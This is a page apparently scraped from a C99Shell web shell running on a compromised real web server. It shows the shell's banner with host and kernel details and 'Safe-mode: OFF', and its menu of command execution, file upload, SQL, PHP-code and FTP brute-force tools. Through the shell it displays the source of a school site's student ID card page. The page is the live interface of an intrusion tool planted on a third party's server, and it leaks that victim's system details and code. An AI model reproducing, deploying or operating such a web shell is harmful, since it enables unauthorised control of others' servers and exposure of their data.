!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.24.0. PHP/7.3.32 

uname -a: Linux ip-172-31-28-255.ec2.internal 6.1.159-181.297.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC
Mon Dec 22 22:31:59 UTC 2025 x86_64
 

 

Safe-mode: OFF (not secure)

/www/wwwroot/itce.co.in/branch2/print/   drwxr-xr-x
Free 30.72 GB of 49.93 GB (61.53%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     identitycard.php (3.21 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
// Start the session
session_start();
?>
<?php
include('session.php');
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Student ID CARD </title>
<link rel="stylesheet" href="js/bootstrap.min.css">
          <script src="js/jquery.min.js"></script>
          <script src="js/bootstrap.min.js"></script>
          <link rel="stylesheet" type="text/css" href="css/style.css">
        <link href='https://fonts.googleapis.com/css?family=Hind' rel='stylesheet' type='text/css'>
        <link rel="shortcut icon" href="favicon.html" />
        <link rel="apple-touch-icon" href="apple-touch-icon.html" />


<style type="text/css">
.boldtable, .boldtable TD, .boldtable TH
{
font-family:sans-serif;
font-size:8pt;
color:BLACK;
background-color:white;
}
</style>
</head>
<script type="text/javascript">

 function print1(strid)
 {
 if(confirm("Do you want to print?"))
 {
 var values = document.getElementById(strid);
 

 
 
 var printing =
 window.open('','','left=0,top=0,size=12, width=550,height=400,toolbar=0,scrollbars=0,sta?tus=0');
 
 printing.document.write(values.innerHTML);
 
 printing.document.close();
 printing.focus();
 printing.print();
 printing.close();
 }
 }
 </script>
 
</head>
<center>
<body>
 <table width="100%" border="0" cellspacing="0" cellpadding="0" bgcolor="#CCCCCC">
   <tr>
    <td width="823" colspan="4" align="center"><?php include('../header.php'); ?></td>
    </tr>
  <tr>
        <td colspan="3" bgcolor="#CCCCCC"> </td>
</tr>
<tr>
        <td colspan="3" bgcolor="#CCCCCC"> <?php include('../sessisionbar.php'); ?></td>
</tr>
 </table>

 <form action="idprint.php" method="post" name="form">
 <table width="100%" border="0" cellspacing="1" cellpadding="1">
  <tr align="left"  width="100">
    <td width="83" bgcolor="#FFCC00"><input name="q" type="text" /></td>
    
    <td width="362" bgcolor="#FFCC00"><input type="submit" name="Submit" value="Search" /></td>
  </tr>
</table>

 </form>
 
  <table width="100%" border="0" cellspacing="0" cellpadding="0" bgcolor="#CCCCCC">
   <tr>
    <td><?php include('../footer.php'); ?></td>
    </tr>
  
 </table>
     <script>
          (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
          (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
          m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
          })(window,document,'script','../www.google-analytics.com/analytics.js','ga');
        
          ga('create', 'UA-74432518-1', 'auto');
          ga('send', 'pageview');
        
        </script>
        
                <!-- Navbar Stickey -->
                <script>
                    $(document).ready(function () {

                    var menu = $('.menu');
                    var origOffsetY = menu.offset().top;
                    
                    function scroll() {
                        if ($(window).scrollTop() >= origOffsetY) {
                            $('.menu').addClass('navbar-fixed-top');
                            $('.content').addClass('menu-padding');
                        } else {
                            $('.menu').removeClass('navbar-fixed-top');
                            $('.content').removeClass('menu-padding');
                        }
                    
                    
                       }
                    
                      document.onscroll = scroll;
                    
                    });
                </script>

      
     

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.002 ]--